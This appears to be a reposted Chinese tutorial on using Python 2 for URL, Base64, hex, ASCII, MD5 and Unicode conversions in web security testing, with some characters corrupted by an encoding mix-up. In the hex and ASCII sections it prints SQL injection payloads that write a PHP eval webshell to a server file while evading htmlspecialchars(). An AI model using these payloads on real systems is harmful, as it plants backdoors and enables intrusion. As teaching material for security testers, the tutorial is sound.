前言
記得剛?cè)腴T那個時候,自己處理編碼轉(zhuǎn)換問題往往是“百度:url解碼、base64加密、hex……”,或者是使用一款叫做“小葵多功能轉(zhuǎn)換工具”的軟件,再后來直接上Burpsuite的decoder功能,感覺用的還挺好的。不過,也遇到些問題:在線轉(zhuǎn)換效率低(搜索占去了2/3的時間)、兩款工具存在一些小問題,比如burp中涉及中文往往顯示亂碼。
直到使用python來作為我日常編碼轉(zhuǎn)換工具……
開啟py轉(zhuǎn)換之旅
url編碼
url編碼是一種瀏覽器用來打包表單輸入的格式.可謂是一名作為web人員最熟悉的一種編碼方式了。
|
1
2
3
4
5
6
7
|
>>> from urllib import *>>> quote("union select null,null,null")'union%20select%20null%2Cnull%2Cnull'>>> unquote("union%20select%20null%2Cnull%2Cnull")'union select null,null,null'>>> urlencode({'x':'2333','y':'666'})'y=666&x=2333' |
Base64
Base64常常用作網(wǎng)頁表單和HTTP傳輸?shù)囊恍﹨?shù),也常用于郵件協(xié)議傳輸用戶信息等。
|
1
2
3
4
5
|
>>> import base64>>> base64.b64encode("admin")'YWRtaW4='>>> base64.b64decode('YWRtaW4=')'admin' |
記得有次ctf比賽中考到了base32解密,一般網(wǎng)站不提供在線解密,一時之間貌似沒有辦法繼續(xù)下去。不過如果你使用python的話會像上邊解密base64一樣簡單,只需要將函數(shù)改變下:
|
1
2
3
4
5
|
>>> import base64>>> base64.b32encode('jjjjj')'NJVGU2TK'>>> base64.b32decode('NJVGU2TK')'jjjjj' |
Hex
十六進制編碼也是web application中常見的一種編碼方案。作為一名web安全人員,我們心知肚明的是,MySQL注入可以使用hex繞過htmlspecialchars()函數(shù)從而寫入webshell。
比如:
|
1
|
select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php' |
下面是python實現(xiàn)hex加解密的方法:
|
1
2
3
4
5
6
|
>>> '<?php @eval($_POST[a]); ?>'.encode('hex')'3c3f70687020406576616c28245f504f53545b615d293b203f3e'>>>>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')<?php @eval($_POST[a]); ?>>>> |
ASCii
MySQL中的char()函數(shù)則是轉(zhuǎn)換ascii碼的,正因如此,也可以使用這個特性來繞過htmlspecialchars()函數(shù)。
比如:
|
1
|
select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php' |
使用python將字符串轉(zhuǎn)換ascii很簡單,但是逆轉(zhuǎn)換的話需要需要點小操作:
|
1
2
3
4
5
6
7
8
9
|
>>> map(ord, "<?php phpinfo() ?>")[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]>>> print chr(112)p>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]>>> print ''.join(map(chr,l)) #感謝pcat表哥指出的方法<?php phpinfo() ?> |
Md5
md5在web安全界可以說是人盡皆知了,以他的不可逆性,大多數(shù)網(wǎng)站存儲用戶密碼等關(guān)鍵數(shù)據(jù)時常常使用md5加密。有的時候我們提交payload需要md5加密,這個時候用下面的方法就可以輕松實現(xiàn)。當(dāng)然解密的話推薦去cmd5。
|
1
2
3
4
5
6
7
8
9
|
>>> from hashlib import md5>>> m = md5()>>> m.update('this is a secret')>>> m.hexdigest()'7dbbcee180ba4d456e4aa1cfbdad9c7b'>>> m.hexdigest()[8:-8]'80ba4d456e4aa1cf'>>> |
Unicode轉(zhuǎn)中文
unicode轉(zhuǎn)換中文,很多情況下都能遇到。尤其是在做滲透測試的時候。用burp的話會存在中文亂碼的問題,在python下實現(xiàn)非常簡單。
|
1
2
|
>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"你需要重新登陸 |
總結(jié)
python實際上在實際使用中非常方便,編碼轉(zhuǎn)換只是其中一個例子。文中提到的編碼轉(zhuǎn)換皆為筆者日常積累,如果有沒有涉及到的地方,歡迎評論補充。好了,以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對服務(wù)器之家的支持。
原文鏈接:https://www.ohlinge.cn/python/python_encode.html
